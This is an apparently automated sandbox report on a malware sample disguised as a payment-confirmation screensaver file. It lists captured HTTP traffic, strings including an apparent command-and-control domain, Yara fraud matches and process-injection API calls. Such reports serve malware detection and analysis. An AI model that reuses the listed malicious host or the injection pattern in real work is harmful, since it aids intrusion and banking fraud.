99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:17 GMTContent-Type: text/htmlContent-Length: 7979Connection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: "1f2b-59f878ddd2a87"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2a 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 69 6d 67 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 7d 0d 0a 75 6c 20 7b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0d 0a 7d 0d 0a 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0d 0a 7d 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 
65 6e 74 65 72 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 31 34 33 2c 20 38 33 29 3b 0d 0a 7d 0d 0a 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 34 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 68 32 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0d 0a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:31 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: Payent confirmation copy 00888754087.scr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Payent confirmation copy 00888754087.scr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867134338.000000000423C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
Source: Payent confirmation copy 00888754087.scr String found in binary or memory: http://ocsp.comodoca.com0
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.0000000002401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payent confirmation copy 00888754087.scr String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867501837.000000000502E000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.jingdongpt.shop
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867501837.000000000502E000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.jingdongpt.shop/j64s/
Source: finger.exe, 00000006.00000002.868129541.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: finger.exe, 00000006.00000002.867321380.0000000003F8E000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000043CE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://ad.netowl.jp/js/star-errorpage.js?date=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: finger.exe, 00000006.00000002.867321380.0000000002CB6000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000030F6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://error.skycloud.tw/system/error?code=400
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Payent confirmation copy 00888754087.scr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: 4ub-1K1Qxn.6.dr String found in binary or memory: https://www.google.com/favicon.ico
Source: finger.exe, 00000006.00000002.867321380.0000000003F8E000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000043CE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.star.ne.jp/

E-Banking Fraud

Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\finger.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0042CE23 NtClose, 3_2_0042CE23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A307AC NtCreateMutant,LdrInitializeThunk, 3_2_00A307AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2F9F0 NtClose,LdrInitializeThunk, 3_2_00A2F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk, 3_2_00A2FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A2FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A2FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A300C4 NtCreateFile, 3_2_00A300C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A30060 NtQuerySection, 3_2_00A30060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A30078 NtResumeThread, 3_2_00A30078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A30048 NtProtectVirtualMemory, 3_2_00A30048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A301D4 NtSetValueKey, 3_2_00A301D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A3010C NtOpenDirectoryObject, 3_2_00A3010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A30C40 NtGetContextThread, 3_2_00A30C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A310D0 NtOpenProcessToken, 3_2_00A310D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A31148 NtOpenThread, 3_2_00A31148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2F8CC NtWaitForSingleObject, 3_2_00A2F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A31930 NtSetContextThread, 3_2_00A31930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2F938 NtWriteFile, 3_2_00A2F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2F900 NtReadFile, 3_2_00A2F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FAB8 NtQueryValueKey, 3_2_00A2FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FAD0 NtAllocateVirtualMemory, 3_2_00A2FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FA20 NtQueryInformationFile, 3_2_00A2FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FA50 NtEnumerateValueKey, 3_2_00A2FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FBB8 NtQueryInformationToken, 3_2_00A2FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FBE8 NtQueryVirtualMemory, 3_2_00A2FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FB50 NtCreateKey, 3_2_00A2FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FC90 NtUnmapViewOfSection, 3_2_00A2FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FC30 NtOpenProcess, 3_2_00A2FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FC60 NtMapViewOfSection, 3_2_00A2FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FC48 NtSetInformationFile, 3_2_00A2FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A31D80 NtSuspendThread, 3_2_00A31D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FD8C NtDelayExecution, 3_2_00A2FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FD5C NtEnumerateKey, 3_2_00A2FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FEA0 NtReadVirtualMemory, 3_2_00A2FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FED0 NtAdjustPrivilegesToken, 3_2_00A2FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FE24 NtWriteVirtualMemory, 3_2_00A2FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FFB4 NtCreateSection, 3_2_00A2FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FFFC NtCreateProcessEx, 3_2_00A2FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A2FF34 NtQueueApcThread, 3_2_00A2FF34
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001D0494 0_2_001D0494
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001D7908 0_2_001D7908
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001D8968 0_2_001D8968
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001DF310 0_2_001DF310
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001DF748 0_2_001DF748
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001D0898 0_2_001D0898
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001DFB71 0_2_001DFB71
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001DFB80 0_2_001DFB80
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001DEED8 0_2_001DEED8
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_00402E34 0_2_00402E34
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_004000F0 0_2_004000F0
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001D1242 0_2_001D1242
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Code function: 0_2_001D04E4 0_2_001D04E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00418C73 3_2_00418C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004014F0 3_2_004014F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004030F0 3_2_004030F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00401200 3_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00410413 3_2_00410413
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004044F7 3_2_004044F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0042F4A3 3_2_0042F4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00402560 3_2_00402560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0040E643 3_2_0040E643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00410633 3_2_00410633
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00416E83 3_2_00416E83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0040E790 3_2_0040E790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0040E793 3_2_0040E793
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A3E0C6 3_2_00A3E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A3E2E9 3_2_00A3E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AE63BF 3_2_00AE63BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A663DB 3_2_00A663DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A42305 3_2_00A42305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A8A37B 3_2_00A8A37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AC443E 3_2_00AC443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AC05E3 3_2_00AC05E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A5C5F0 3_2_00A5C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A86540 3_2_00A86540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A44680 3_2_00A44680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A4E6C1 3_2_00A4E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AE2622 3_2_00AE2622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A8A634 3_2_00A8A634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A4C7BC 3_2_00A4C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A6286D 3_2_00A6286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A4C85C 3_2_00A4C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A429B2 3_2_00A429B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AE098E 3_2_00AE098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AD49F5 3_2_00AD49F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A569FE 3_2_00A569FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A8C920 3_2_00A8C920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AECBA4 3_2_00AECBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AC6BCB 3_2_00AC6BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AE2C9C 3_2_00AE2C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ACAC5E 3_2_00ACAC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A70D3B 3_2_00A70D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A4CD5B 3_2_00A4CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A72E2F 3_2_00A72E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A5EE4C 3_2_00A5EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ADCFB1 3_2_00ADCFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AB2FDC 3_2_00AB2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A50F3F 3_2_00A50F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A6D005 3_2_00A6D005
